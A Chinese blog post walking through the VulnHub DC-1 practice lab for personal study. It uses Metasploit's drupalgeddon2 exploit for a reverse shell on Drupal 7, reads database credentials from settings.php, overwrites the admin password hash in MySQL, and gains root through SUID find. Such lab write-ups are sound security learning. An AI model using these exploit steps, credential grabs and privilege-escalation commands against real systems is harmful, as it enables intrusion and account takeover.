DC-1靶场渗透测试过程(个人学习)

DC-1靶场下载地址:

        DC: 1 ~ VulnHub

攻击机kali的IP地址:192.168.37.129

注意靶机和攻击机的环境配置要一致

一、信息收集

方法一:nmap扫描

方法二:arp-scan -l

使用  arp-scan -l  扫描该网段内其他的IP地址效率相对快一些

扫描后得到靶机的IP地址为:192.168.37.133

使用nmap扫描靶机的IP,发现其22、80、111端口开放

访问该IP的80端口,是一个登录页面,同时通过Wappalyzer可以看出该网站的CMS系统为Drupal 7

对于一个登录框,总会有些奇怪的想法,尝试了弱口令、sql注入、暴力破解都不行

二、漏洞利用

前面通过Wappalyzer发现该网站的CMS为Drupal 7,则可以进入msf查找相应模块的漏洞是否可以利用

1、进入msf

msfconsole

2、查找相应的模块的漏洞

search Drupal

可以看到有很多版本,这里选择使用exploit/unix/webapp/drupal_drupalgeddon2,这个版本比较新,优先级也较高

利用该模块,并查看该配置选项,可以利用这个模块的payload建立一个反向的tcp连接到靶机。

yes的地方是必填的地方,大多数基本上默认都填写好了,所以只需要填靶机的IP即可

配置RHOSTS为靶机的IP地址

set RHOSTS 192.168.37.133

配置成功后直接运行

run 或 exploit

现在可以看到session已经成功建立,接下来获得shell

为了方便观看与使用,再使用python反弹shell

python -c "import pty;pty.spawn('/bin/bash')"

三、获取flag

flag1

建立反弹shell后,查看该目录下的文件可以发现flag1.txt,cat即可获得到flag1.txt

flag2

flag1.txt提示:每个好的CMS都需要一个配置文件——你也是

搜索一下Drupal的配置文件的路径为:/var/www/sites/default/settings.php

则查看该配置文件的内容

cat /var/www/sites/default/settings.php

得到了flag2,也得到了一个提示

*暴力和字典攻击不是最常见的

*只有获得访问权限的方法(您将需要访问权限)。

*你能用这些证书做什么?

flag3

获取到flag2和提示的同时也获得了数据库的账号与密码

我们可以尝试使用该用户名和密码登录数据库

mysql -udbuser -pR0ck3t

登录成功后查看库

show databases;

进入drupaldb库中

use drupaldb

查看该库中的表

show tables;

可以发现库中有一个 users 表,一般users表中存放着用户的信息,查看表中内容

select * from users;

可以看到admin账号密码的hash值,对于hash值的破解基本上不太现实,可以尝试将admin的密码替换,所以需要找一下加密的文件。 

百度搜索一下可以知道 Drupal 7 的hash密码脚本存放于script目录下的password-hash.s 

使用该脚本对 “12345” 这个值进行hash

php scripts/password-hash.sh 123456

可以得到“123456” 的hash值,将hash后的密码复制

回到数据库中使用update命令更改密码,更改完再查看一下是否成功更改了密码

update users set pass='$S$DRchherDZrUWkE7m5gohDT75xMO1MXq.Ivcv3B88F0WVHT8U47Tp' where uid=1;

可以看到密码已经更改,访问页面输入账号密码登录即可

在网站中四处逛逛,不难发现flag3,点击flag3便跳转页面得到了flag3中的内容

flag4

flag4其实一开始就发现,成功建立shell后,cat /etc/passwd 查看用户信息的时候就发现存在要给flag4的用户

切换到/home/flag4目录下,可以发现flag4.txt文件,提取即可看到flag4.txt 的提示

flag5

find提权

显示 你是否能用同样的方法用root用户查看此flag,发现提示我们权限不够

既然要提权,那我们查看一下有哪些suid权限

find / -perm -u=s -type f 2>/dev/null

可以看到find就在其中,那就可以使用find提权

使用一下命令进行提权,提权成功后查看权限可以发现已经是root用户

find -exec "/bin/sh" \;

已经获得到了root的权限,即可切换到 /root 目录下可以找到最后一个flag

  • 34
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值